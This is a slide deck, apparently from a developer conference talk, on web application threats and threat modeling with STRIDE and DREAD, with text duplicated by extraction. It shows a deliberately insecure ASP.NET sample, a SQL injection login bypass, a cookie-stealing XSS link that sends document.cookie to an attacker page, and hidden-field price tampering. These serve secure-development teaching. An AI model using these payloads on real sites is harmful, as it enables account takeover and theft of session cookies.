Embed Size (px)
DESCRIPTION
Call To Action Secure software requires knowledgeable IT personnel Software isn't secure if the network is not Administration is the bedrock of security Secure software also requires knowledgeable developers Proper administration is meaningless if the code you write isn't secure Most developers today don't know they're writing insecure code
Citation preview
DEV311DEV311Building Secure Web Building Secure Web Applications: Threats And Applications: Threats And Threat ModelingThreat Modeling
Jeff ProsiseJeff ProsiseCo-founderCo-founderWintellect (www.wintellect.com)Wintellect (www.wintellect.com)
Why Security?Why Security?
Reported security breaches Reported security breaches in the last 12 monthsin the last 12 months
Acknowledged financial Acknowledged financial losses as a resultlosses as a result
Identified Internet connection Identified Internet connection as frequent source of attacksas frequent source of attacks
Reported intrusions to Reported intrusions to authoritiesauthorities
90%90%
2002 Computer Crime and Security Survey2002 Computer Crime and Security Survey
80%80%
74%74%
34%34%
Percentages of companies who participated in the surveyPercentages of companies who participated in the survey
Call To ActionSecure software requires Secure software requires knowledgeable IT personnelknowledgeable IT personnel
Software isn't secure if the network is notSoftware isn't secure if the network is notAdministration is the bedrock of securityAdministration is the bedrock of security
Secure software also requires Secure software also requires knowledgeable developersknowledgeable developers
Proper administration is meaningless if Proper administration is meaningless if the code you write isn't securethe code you write isn't secureMost developers today don't know they're Most developers today don't know they're writing insecure codewriting insecure code
This Is Insecure Code!This Is Insecure Code!
<html> <body> <form runat="server"> <asp:TextBox ID="Input" runat="server" /> <asp:Button Text="Click Me" OnClick="OnSubmit" runat="server" /> <asp:Label ID="Output" runat="server" /> </form> </body></html>
<script language="C#" runat="server">void OnSubmit (Object sender, EventArgs e){ Output.Text = "Hello, " + Input.Text;}</script>
Threat TypesThreat Types
Spoofed packets, etc.Spoofed packets, etc.
Buffer overflows, illicit paths, etc. Buffer overflows, illicit paths, etc.
SQL injection, XSS, input tampering, etc.SQL injection, XSS, input tampering, etc.
NetworkNetwork HostHost ApplicationApplication
Threats againstThreats againstthe networkthe network
Threats against the hostThreats against the host
Threats against the applicationThreats against the application
Threats Against The NetworkThreats Against The NetworkThreatThreat ExamplesExamples
Information gatheringInformation gathering Port scanningPort scanningUsing trace routing to detect network topologiesUsing trace routing to detect network topologiesUsing broadcast requests to enumerate subnet Using broadcast requests to enumerate subnet hostshosts
EavesdroppingEavesdropping Using packet sniffers to steal passwordsUsing packet sniffers to steal passwordsDenial of service (DoS)Denial of service (DoS) SYN floodsSYN floods
ICMP echo request floodsICMP echo request floodsMalformed packetsMalformed packets
SpoofingSpoofing Packets with spoofed source addressesPackets with spoofed source addresses
i http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh15.asp?http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh15.asp?frame=true#c15618429_004frame=true#c15618429_004
Threats Against The HostThreats Against The HostThreatThreat ExamplesExamples
Arbitrary code Arbitrary code executionexecution
Buffer overflows in ISAPI DLLs (e.g., MS01-033)Buffer overflows in ISAPI DLLs (e.g., MS01-033)Directory traversal attacks (MS00-078)Directory traversal attacks (MS00-078)
File disclosureFile disclosure Malformed HTR requests (MS01-031)Malformed HTR requests (MS01-031)Virtualized UNC share vulnerability (MS00-019)Virtualized UNC share vulnerability (MS00-019)
Denial of service (DoS)Denial of service (DoS) Malformed SMTP requests (MS02-012)Malformed SMTP requests (MS02-012)Malformed WebDAV requests (MS01-016)Malformed WebDAV requests (MS01-016)Malformed URLs (MS01-012)Malformed URLs (MS01-012)Brute-force file uploadsBrute-force file uploads
Unauthorized accessUnauthorized access Resources with insufficiently restrictive ACLsResources with insufficiently restrictive ACLsSpoofing with stolen login credentialsSpoofing with stolen login credentials
Exploitation of open Exploitation of open ports and protocolsports and protocols
Using NetBIOS and SMB to enumerate hostsUsing NetBIOS and SMB to enumerate hostsConnecting remotely to SQL ServerConnecting remotely to SQL Server
i http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh15.asp?http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh15.asp?frame=true#c15618429_004frame=true#c15618429_004
Threats Against The ApplicationThreats Against The Application
ThreatThreat ExamplesExamplesSQL injectionSQL injection Including DROP TABLE command in text typed into Including DROP TABLE command in text typed into
an input fieldan input fieldCross-site Cross-site scriptingscripting
Using malicious client-side script to steal cookiesUsing malicious client-side script to steal cookies
Hidden-field Hidden-field tamperingtampering
Maliciously changing the value of a hidden fieldMaliciously changing the value of a hidden field
EavesdroppingEavesdropping Using a packet sniffer to steal passwords and Using a packet sniffer to steal passwords and cookies from traffic on unencrypted connectionscookies from traffic on unencrypted connections
Session hijackingSession hijacking Using a stolen session ID cookie to access someone Using a stolen session ID cookie to access someone else's session stateelse's session state
Identity spoofingIdentity spoofing Using a stolen forms authentication cookie to pose Using a stolen forms authentication cookie to pose as another useras another user
Information Information disclosuredisclosure
Allowing client to see a stack trace when an Allowing client to see a stack trace when an unhandled exception occursunhandled exception occurs
i http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh15.asp?http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh15.asp?frame=true#c15618429_004frame=true#c15618429_004
SQL InjectionSQL InjectionExploits applications that don’t Exploits applications that don’t validate input used to form database validate input used to form database commandscommands
Input from <form> fieldsInput from <form> fieldsInput from query stringsInput from query strings
The techniqueThe techniqueFind a <form> field or query string Find a <form> field or query string parameter whose value is used in parameter whose value is used in SQL queriesSQL queriesProvide malicious input that modifies the Provide malicious input that modifies the nature of the querynature of the query
How SQL Injection WorksHow SQL Injection Works
SELECT COUNT (*) FROM UsersSELECT COUNT (*) FROM UsersWHERE UserName=‘Jeff’WHERE UserName=‘Jeff’AND Password=‘imbatman’AND Password=‘imbatman’
SELECT COUNT (*) FROM UsersSELECT COUNT (*) FROM UsersWHERE UserName=‘WHERE UserName=‘’ or 1=1--’ or 1=1--AND Password=‘’AND Password=‘’
Model QueryModel Query
Malicious QueryMalicious Query
"or 1=1" matches every"or 1=1" matches everyrecord in the tablerecord in the table
"—" comments out the"—" comments out theremainder of the queryremainder of the query
SQL InjectionSQL Injection
Cross-Site ScriptingCross-Site ScriptingExploits applications that don’t Exploits applications that don’t validate input echoed to the pagevalidate input echoed to the page
Input from <form> fieldsInput from <form> fieldsInput from query stringsInput from query strings
The techniqueThe techniqueFind a <form> field or query string Find a <form> field or query string parameter whose value is used as outputparameter whose value is used as outputGet a victim to click a link that injects Get a victim to click a link that injects malicious client-side script into the pagemalicious client-side script into the page
How Cross-Site How Cross-Site Scripting WorksScripting Works
<a href="http://…/Search.aspx?<a href="http://…/Search.aspx?SearchSearch=<script language='javascript'>=<script language='javascript'>document.location.replacedocument.location.replace('http://localhost/EvilPage.aspx?('http://localhost/EvilPage.aspx?Cookie=‘ + document.cookie);Cookie=‘ + document.cookie);</script></script>">…</a>">…</a>
Query string contains embedded JavaScript thatQuery string contains embedded JavaScript thatredirects to the hacker’s page and transmits anyredirects to the hacker’s page and transmits anycookies issued by Search.aspx in a query stringcookies issued by Search.aspx in a query string
URL points to the site that the hacker wants to attackURL points to the site that the hacker wants to attack
Cross-Site ScriptingCross-Site Scripting
Hidden-Field TamperingExploits apps that persist data between Exploits apps that persist data between requests by round-tripping it in hidden requests by round-tripping it in hidden <input> fields<input> fieldsThe techniqueThe technique
Look for <input type="hidden" … > tagsLook for <input type="hidden" … > tagsSubmit bogus requests with modified Submit bogus requests with modified value attributes to spoof a Web servervalue attributes to spoof a Web server
How Hidden-Field How Hidden-Field Tampering WorksTampering Works
<input type="hidden" id="price"<input type="hidden" id="price" value="10000.00">value="10000.00">
Page contains this…Page contains this…
Postback data should contain this…Postback data should contain this…
price="10000.00"price="10000.00"
Instead it contains this…Instead it contains this…
price="1.00"price="1.00"
Hidden-Field TamperingHidden-Field Tampering
Session HijackingSession Hijacking
ThreatThreat Risk FactorRisk FactorTheft and replay of session ID cookiesTheft and replay of session ID cookies HighHighLinks to sites that use cookieless Links to sites that use cookieless session statesession state
MediumMedium
Predictable session IDsPredictable session IDs LowLowRemote connection to state server serviceRemote connection to state server service MediumMediumRemote connection to state server databaseRemote connection to state server database MediumMediumEavesdropping on state server connectionEavesdropping on state server connection MediumMedium
Web applications use session stateWeb applications use session stateSessions are per-user state storesSessions are per-user state storesSessions can be compromisedSessions can be compromised
Identity SpoofingIdentity Spoofing
ThreatThreat Risk FactorRisk FactorTheft of Windows authentication Theft of Windows authentication credentialscredentials HighHigh
Theft of forms authentication credentialsTheft of forms authentication credentials HighHighTheft and replay of Theft and replay of authentication cookiesauthentication cookies MediumMedium
Dictionary attacks and Dictionary attacks and password guessingpassword guessing HighHigh
Security depends on authenticationSecurity depends on authenticationIf authentication can be compromised, If authentication can be compromised, security goes out the windowsecurity goes out the windowAuthentication can be compromisedAuthentication can be compromised
Threat ModelingStructured approach to identifying, Structured approach to identifying, quantifying, and addressing threatsquantifying, and addressing threatsEssential part of development processEssential part of development process
Just like specing and designingJust like specing and designingJust like coding and testingJust like coding and testing
One technique presented hereOne technique presented hereThere are others (e.g., OCTAVE)There are others (e.g., OCTAVE)
Threat Modeling ProcessThreat Modeling Process
Identify assetsIdentify assets
Document architectureDocument architecture
Decompose applicationDecompose application
Identify threatsIdentify threats
Document threatsDocument threats
Rate threatsRate threats
11
22
33
44
55
66
Identifying AssetsIdentifying AssetsWhat is it that you want to protect?What is it that you want to protect?
Private data (e.g., customer list) Private data (e.g., customer list) Proprietary data (e.g., IP)Proprietary data (e.g., IP)Potentially injurious data (e.g., credit card Potentially injurious data (e.g., credit card numbers, decryption keys)numbers, decryption keys)
These also count as “assets”These also count as “assets”Integrity of back-end databasesIntegrity of back-end databasesIntegrity of the Web pagesIntegrity of the Web pagesIntegrity of other serversIntegrity of other serversAvailability of the applicationAvailability of the application
11
Document ArchitectureDocument ArchitectureDefine what the application does and Define what the application does and how it’s usedhow it’s used
Users view pages with catalog itemsUsers view pages with catalog itemsUsers perform searches for catalog itemsUsers perform searches for catalog itemsUsers add items to shopping cartsUsers add items to shopping cartsUsers check outUsers check out
Diagram the applicationDiagram the applicationShow subsystemsShow subsystemsShow data flowShow data flowList assetsList assets
22
ExampleExample
BobBob
AliceAlice
BillBill
Asset #4Asset #4
Asset #1Asset #1 Asset #2Asset #2 Asset #3Asset #3
Asset #5Asset #5 Asset #6Asset #6
IISIIS ASP.NETASP.NET
Web Server Web Server
LoginLogin
StateState
MainMain
Database ServerDatabase Server
Firewall
Firewall
Decomposing The AppDecomposing The AppRefine the architecture diagramRefine the architecture diagram
Show authentication mechanismsShow authentication mechanismsShow authorization mechanismsShow authorization mechanismsShow technologies (e.g., DPAPI)Show technologies (e.g., DPAPI)Diagram trust boundariesDiagram trust boundariesIdentify entry pointsIdentify entry points
Begin to think like an attackerBegin to think like an attackerWhere are my vulnerabilities?Where are my vulnerabilities?What am I going to do about them?What am I going to do about them?
33
ExampleExample
BobBob
AliceAlice
BillBillIISIIS ASP.NETASP.NET
Web Server Web Server Database ServerDatabase ServerTrustTrust
Forms AuthenticationForms Authentication URL AuthorizationURL Authorization
DPAPIDPAPI Windows AuthenticationWindows Authentication
Firewall
Firewall
LoginLogin
StateState
MainMain
Identifying ThreatsIdentifying ThreatsMethod #1: Threat listsMethod #1: Threat lists
Start with laundry list of possible threatsStart with laundry list of possible threatsIdentify the threats that apply to Identify the threats that apply to your applicationyour application
Method #2: STRIDEMethod #2: STRIDECategorized list of threat typesCategorized list of threat typesIdentify threats by type/categoryIdentify threats by type/category
Optionally draw Optionally draw threat treesthreat treesRoot nodes represent attacker's goalsRoot nodes represent attacker's goalsTrees help identify threat conditionsTrees help identify threat conditions
44
STRIDESTRIDE
SSTTRRIIDD
TamperingTampering
RepudiationRepudiation
Information disclosureInformation disclosure
Denial of serviceDenial of service
Can an attacker gain access using a false identity?Can an attacker gain access using a false identity?
Can an attacker modify data as it flows through the application?Can an attacker modify data as it flows through the application?
If an attacker denies an exploit, can you prove him or her wrong?If an attacker denies an exploit, can you prove him or her wrong?
Can an attacker gain access to private or potentially injurious data?Can an attacker gain access to private or potentially injurious data?
Can an attacker crash or reduce the availability of the system?Can an attacker crash or reduce the availability of the system?
EE Elevation of privilegeElevation of privilegeCan an attacker assume the identity of a privileged user?Can an attacker assume the identity of a privileged user?
SpoofingSpoofing
Threat TreesThreat TreesTheft ofTheft of
Auth CookiesAuth CookiesObtain auth Obtain auth cookie to spoof cookie to spoof identityidentity
UnencryptedUnencryptedConnectionConnection
Cookies Cookies travel over travel over unencrypted unencrypted HTTPHTTP
EavesdroppingEavesdropping
Attacker uses Attacker uses sniffer to sniffer to monitor HTTP monitor HTTP traffictraffic
Cross-SiteCross-SiteScriptingScripting
Attacker Attacker possesses possesses means and means and knowledgeknowledge
XSSXSSVulnerabilityVulnerability
Application is Application is vulnerable to vulnerable to XSS attacksXSS attacks
OROR
ANDAND ANDAND
Documenting ThreatsDocumenting Threats
Theft of Auth Cookies by Eavesdropping on ConnectionTheft of Auth Cookies by Eavesdropping on ConnectionThreat targetThreat target Connections between browsers and Web serverConnections between browsers and Web serverRiskRiskAttack techniquesAttack techniques Attacker uses sniffer to monitor trafficAttacker uses sniffer to monitor trafficCountermeasuresCountermeasures Use SSL/TLS to encrypt trafficUse SSL/TLS to encrypt traffic
Document threats using a templateDocument threats using a template
Theft of Auth Cookies via Cross-Site ScriptingTheft of Auth Cookies via Cross-Site ScriptingThreat targetThreat target Vulnerable application codeVulnerable application codeRiskRiskAttack techniquesAttack techniques Attacker sends e-mail with malicious link to usersAttacker sends e-mail with malicious link to usersCountermeasuresCountermeasures Validate input; HTML-encode outputValidate input; HTML-encode output
55
Rating ThreatsRating ThreatsSimple modelSimple model
DREAD modelDREAD modelGreater granularization of threat potentialGreater granularization of threat potentialRates each threat on scale of 1 to 15Rates each threat on scale of 1 to 15Widely used within MicrosoftWidely used within Microsoft
Risk = Probability * Damage PotentialRisk = Probability * Damage Potential
1-10 Scale1-10 Scale1 = Least probable1 = Least probable10 = Most probable10 = Most probable
1-10 Scale1-10 Scale1 = Least damage1 = Least damage10 = Most damage10 = Most damage
66
DREADDREAD
DDRREEAADD
ReproducibilityReproducibility
ExploitabilityExploitability
Affected usersAffected users
DiscoverabilityDiscoverability
What are the consequences of a successful exploit?What are the consequences of a successful exploit?
Would an exploit work every time or only under certain circumstances?Would an exploit work every time or only under certain circumstances?
How skilled must an attacker be to exploit the vulnerability?How skilled must an attacker be to exploit the vulnerability?
How many users would be affected by a successful exploit?How many users would be affected by a successful exploit?
How likely is it that an attacker will know the vulnerability exists?How likely is it that an attacker will know the vulnerability exists?
Damage potentialDamage potential
DREADDREADHigh (3)High (3) Medium (2)Medium (2) Low (1)Low (1)
Damage Damage potentialpotential
Attacker can Attacker can retrieve retrieve extremely extremely sensitive data sensitive data and corrupt or and corrupt or destroy datadestroy data
Attacker can retrieve Attacker can retrieve sensitive data but do sensitive data but do little elselittle else
Attacker can only Attacker can only retrieve data that has retrieve data that has little or no potential little or no potential for harmfor harm
Reproduc-Reproduc-abilityability
Works every Works every time; does not time; does not require a timing require a timing windowwindow
Timing-dependent; Timing-dependent; works only within a works only within a time windowtime window
Rarely worksRarely works
ExploitabilityExploitability Bart Simpson Bart Simpson could do itcould do it
Attacker must be Attacker must be somewhat somewhat knowledgeable and knowledgeable and skilledskilled
Attacker must be Attacker must be VERY knowledgeable VERY knowledgeable and skilledand skilled
Affected usersAffected users Most or all usersMost or all users Some usersSome users Few if any usersFew if any usersDiscoverabiltyDiscoverabilty Attacker can Attacker can
easily discover easily discover the vulnerabilitythe vulnerability
Attacker might Attacker might discover the discover the vulnerabilityvulnerability
Attacker will have to Attacker will have to dig to discover the dig to discover the vulnerabilityvulnerability
ExampleThreatThreat DD RR EE AA DD SumSum
Auth cookie theft (eavesdropping)Auth cookie theft (eavesdropping) 33 22 33 22 33 1313Auth cookie theft (XSS)Auth cookie theft (XSS) 33 22 22 22 33 1212
Potential for damage is highPotential for damage is high(spoofed identities, etc.)(spoofed identities, etc.)
Cookie can be stolen any time, but Cookie can be stolen any time, but is only useful until expiredis only useful until expired
Anybody can run a packet sniffer; Anybody can run a packet sniffer; XSS attacks require moderate skillXSS attacks require moderate skill
All users could be affected, but All users could be affected, but in reality most won't click in reality most won't click malicious linksmalicious links
Easy to discover: just type a Easy to discover: just type a <script> block into a field<script> block into a field
PrioritizedPrioritizedRisksRisks
Microsoft Products And Services For Lifelong Learningwww.microsoft.com/learning
AssessmentsAssessments www.microsoft.com/assessmentwww.microsoft.com/assessment
CoursesCourses2310: Developing Microsoft ASP .NET Web Applications Using Visual 2310: Developing Microsoft ASP .NET Web Applications Using Visual Studio .NETStudio .NET2640: Upgrading Web Development Skills from ASP to Microsoft ASP .NET2640: Upgrading Web Development Skills from ASP to Microsoft ASP .NET1905: Building XML-Based Web Applications 1905: Building XML-Based Web Applications 2311: Advanced ASP.NET (scheduled release July 04)2311: Advanced ASP.NET (scheduled release July 04)
BooksBooks
Designing ASP .NET Applications, ISBN: 0-7356-1348-6Designing ASP .NET Applications, ISBN: 0-7356-1348-6Programming Microsoft ASP .NET, ISBN: 0-7356-1903-4Programming Microsoft ASP .NET, ISBN: 0-7356-1903-4Microsoft ASP .NET Coding Strategies with the Microsoft ASP .NET Team, Microsoft ASP .NET Coding Strategies with the Microsoft ASP .NET Team, ISBN: 0-7356-1900-XISBN: 0-7356-1900-XDeveloping Microsoft® ASP.NET Server Controls and Components, ISBN: Developing Microsoft® ASP.NET Server Controls and Components, ISBN: 0-7356-1582-9 0-7356-1582-9 Building Secure Microsoft ASP .NET Applications, ISBN: 0-7356-1890-9Building Secure Microsoft ASP .NET Applications, ISBN: 0-7356-1890-9Building Microsoft ASP .NET Applications for Mobile Devices (Second Building Microsoft ASP .NET Applications for Mobile Devices (Second Edition), Edition), ISBN: 0-7356-1914-XISBN: 0-7356-1914-XMCAD/MCSD Self-Paced Training Kit: Developing Web Applications with MCAD/MCSD Self-Paced Training Kit: Developing Web Applications with Microsoft Visual Basic .NET and Microsoft Visual C# .NET (Second Microsoft Visual Basic .NET and Microsoft Visual C# .NET (Second Edition), ISBN 0-7356-1927-1Edition), ISBN 0-7356-1927-1
Microsoft Products and Services for Lifelong LearningMicrosoft Products and Services for Lifelong Learning
DEV311 DEV311 Building Secure Web Building Secure Web Applications: Threats And Applications: Threats And Threat ModelingThreat Modeling
Jeff ProsiseJeff ProsiseCo-founderCo-founderWintellect (www.wintellect.com)Wintellect (www.wintellect.com)
